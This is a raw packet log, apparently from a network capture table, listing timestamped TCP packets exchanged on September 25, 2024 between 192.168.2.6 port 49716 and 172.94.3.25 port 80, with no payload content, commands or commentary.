                                        Sep 25, 2024 18:40:28.670408964 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670419931 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670420885 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670432091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670439005 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670443058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670456886 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670475006 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670495033 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670504093 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670681000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670692921 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670703888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670715094 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670717001 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670742035 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670882940 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670900106 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670913935 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670926094 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670927048 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670937061 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670948982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.670952082 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.670977116 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671164989 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671334982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671346903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671358109 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671371937 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671401978 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671494007 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671511889 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671530962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671541929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671545029 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671552896 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671561003 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671565056 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671581984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671590090 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671592951 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671603918 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671614885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671622038 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671642065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671642065 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671658993 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671670914 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671681881 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671693087 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671695948 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671706915 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671720028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671722889 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671726942 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671732903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671739101 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671744108 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671756029 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671766996 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671767950 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671777964 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671789885 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.671798944 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.671816111 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.711159945 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.934303999 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.934401989 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.973079920 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978132010 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978162050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978176117 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978224039 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978235960 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978246927 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978260040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978279114 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978307009 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978374958 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978385925 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978410006 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978415012 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978421926 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978434086 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978446007 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978457928 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978467941 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978468895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978482008 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978487968 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978526115 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978634119 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978645086 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978656054 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978667974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978679895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978679895 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978712082 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978904009 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978914022 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978919983 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978930950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978950024 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978959084 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.978961945 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978974104 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978984118 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978996992 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.978998899 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979007959 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979020119 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979024887 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979031086 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979043007 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979047060 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979053974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979065895 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979065895 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979077101 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979082108 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.979089975 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979100943 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.979101896 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203191042 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203202963 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203203917 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203218937 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203233004 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203259945 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203291893 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203303099 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203315973 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203342915 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203438044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203449965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203460932 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203473091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203485012 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203486919 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203496933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203511953 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203517914 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203524113 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203537941 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203550100 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203557968 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203562975 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203586102 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203594923 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203603983 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203607082 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203619957 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203632116 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203644037 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203650951 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203661919 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203672886 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203674078 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203694105 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203696966 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203707933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203720093 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203732014 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203742981 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203743935 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203754902 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203766108 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203777075 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203784943 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203795910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203798056 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203807116 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203818083 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203830004 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203840971 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203843117 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203857899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203867912 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203870058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203883886 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.203891039 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.203908920 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204139948 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204152107 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204164982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204178095 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204190016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204191923 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204222918 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204284906 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204297066 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204308987 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204323053 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204335928 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204343081 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204348087 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204359055 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204370022 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204371929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204385042 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204391956 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204396963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204408884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204411030 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204421997 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204442024 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204456091 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204463005 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204468012 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204476118 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204479933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204492092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204493046 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204504013 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204515934 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204531908 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204541922 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204544067 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204554081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204562902 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204566956 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204582930 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204585075 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204593897 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204606056 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204619884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204627037 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204632044 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204646111 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204653978 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204658031 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204669952 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204677105 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204683065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204694986 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204695940 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204708099 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204720974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204727888 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204735041 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204746962 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204756975 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204758883 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.204777002 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.204792976 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205136061 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205147982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205162048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205174923 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205187082 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205190897 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205199957 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205210924 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205221891 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205224991 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205245018 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205260992 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205324888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205338001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205351114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205364943 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205372095 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205380917 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205394030 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205403090 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205406904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205418110 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205425978 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205430031 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205442905 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205444098 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205452919 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205473900 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205487013 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205495119 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205499887 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205507994 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205514908 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205529928 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205542088 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205543041 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205555916 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205569029 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205575943 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205581903 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205595016 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205595016 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205609083 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205620050 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205624104 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205632925 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205645084 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205655098 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205658913 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205671072 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205676079 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205683947 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205694914 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205697060 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205710888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205723047 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205723047 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205734015 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205746889 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205759048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205769062 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205769062 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.205771923 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.205794096 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206136942 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206149101 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206165075 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206176996 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206185102 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206187963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206201077 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206212997 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206216097 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206224918 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206237078 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206237078 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206249952 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206258059 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206270933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206273079 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206283092 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206295967 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206302881 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206307888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206320047 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206331968 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206331968 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206345081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206353903 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206362963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206373930 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206384897 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:29.206392050 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:29.206397057 CEST8049716172.94.3.25192.168.2.6
